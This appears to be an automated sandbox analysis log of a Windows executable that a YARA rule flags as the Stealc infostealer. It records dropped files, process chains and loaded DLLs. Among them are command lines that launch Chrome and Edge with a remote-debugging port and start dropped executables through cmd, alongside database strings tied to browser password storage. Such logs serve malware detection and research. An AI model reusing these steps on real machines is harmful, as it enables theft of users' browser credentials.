Source: ElmEHL9kP9.exe, 00000000.00000003.1763124942.0000000005D22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs ElmEHL9kP9.exe
Source: ElmEHL9kP9.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_stealc_str_oct24 author = Sekoia.io, description = Finds Stealc standalone samples (or dumps) based on the strings, creation_date = 2024-10-20, classification = TLP:CLEAR, version = 1.0, id = 7448fafe-206c-4f9c-b5a3-cbabec12a45b
Source: ElmEHL9kP9.exe Static PE information: Section: ZLIB complexity 0.9995212928921569
Source: ElmEHL9kP9.exe Static PE information: Section: gcovadtk ZLIB complexity 0.9946562836953173
Source: BFCGDAAKFH.exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.18.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 5TWLADXGMSKDNXXRW4MQ8.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@40/60@3/8
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CB70300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError, 6_2_6CB70300
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\5TWLADXGMSKDNXXRW4MQ8.exe.log Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5276:120:WilError_03
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File created: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3.dll.6.dr, softokn3[1].dll.6.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2487917051.000000000580C000.00000004.00000020.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2495656771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2496708926.000000006CC9F000.00000002.00000001.01000000.0000000D.sdmp, nss3[1].dll.6.dr, nss3.dll.6.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.6.dr, softokn3[1].dll.6.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2487917051.000000000580C000.00000004.00000020.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2495656771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2496708926.000000006CC9F000.00000002.00000001.01000000.0000000D.sdmp, nss3[1].dll.6.dr, nss3.dll.6.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2487917051.000000000580C000.00000004.00000020.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2495656771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2496708926.000000006CC9F000.00000002.00000001.01000000.0000000D.sdmp, nss3[1].dll.6.dr, nss3.dll.6.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2487917051.000000000580C000.00000004.00000020.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2495656771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2496708926.000000006CC9F000.00000002.00000001.01000000.0000000D.sdmp, nss3[1].dll.6.dr, nss3.dll.6.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.6.dr, softokn3[1].dll.6.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.6.dr, softokn3[1].dll.6.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.6.dr, softokn3[1].dll.6.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.6.dr, softokn3[1].dll.6.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.6.dr, softokn3[1].dll.6.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2487917051.000000000580C000.00000004.00000020.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2495656771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2496708926.000000006CC9F000.00000002.00000001.01000000.0000000D.sdmp, nss3[1].dll.6.dr, nss3.dll.6.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2487917051.000000000580C000.00000004.00000020.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2495656771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2487917051.000000000580C000.00000004.00000020.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2495656771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2496708926.000000006CC9F000.00000002.00000001.01000000.0000000D.sdmp, nss3[1].dll.6.dr, nss3.dll.6.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3.dll.6.dr, softokn3[1].dll.6.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: ElmEHL9kP9.exe, 00000000.00000003.1577109009.00000000057F7000.00000004.00000800.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1577213991.00000000057DC000.00000004.00000800.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000003.2091356211.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000003.2228753162.00000000056ED000.00000004.00000020.00020000.00000000.sdmp, HDGCFHIDAKECFHIEBFCG.6.dr, DGHIDAFCGIEHIEBFCFBA.6.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2487917051.000000000580C000.00000004.00000020.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2495656771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3.dll.6.dr, softokn3[1].dll.6.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2487917051.000000000580C000.00000004.00000020.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2495656771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.6.dr, softokn3[1].dll.6.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: ElmEHL9kP9.exe Virustotal: Detection: 34%
Source: 5TWLADXGMSKDNXXRW4MQ8.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File read: C:\Users\user\Desktop\ElmEHL9kP9.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\ElmEHL9kP9.exe "C:\Users\user\Desktop\ElmEHL9kP9.exe"
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Process created: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe "C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe"
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Process created: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe "C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe"
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2036,i,977222782350274699,15640815129298603006,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=2360,i,18216618514387370903,8914943351200288340,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2252,i,2792277431044974332,3025383728570224330,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\BFCGDAAKFH.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Documents\BFCGDAAKFH.exe "C:\Users\user\Documents\BFCGDAAKFH.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Process created: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe "C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe" Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Process created: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe "C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\BFCGDAAKFH.exe" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2036,i,977222782350274699,15640815129298603006,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=2360,i,18216618514387370903,8914943351200288340,262144 /prefetch:3 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2252,i,2792277431044974332,3025383728570224330,262144 /prefetch:3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Documents\BFCGDAAKFH.exe "C:\Users\user\Documents\BFCGDAAKFH.exe"
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: propsys.dll Jump to behavior
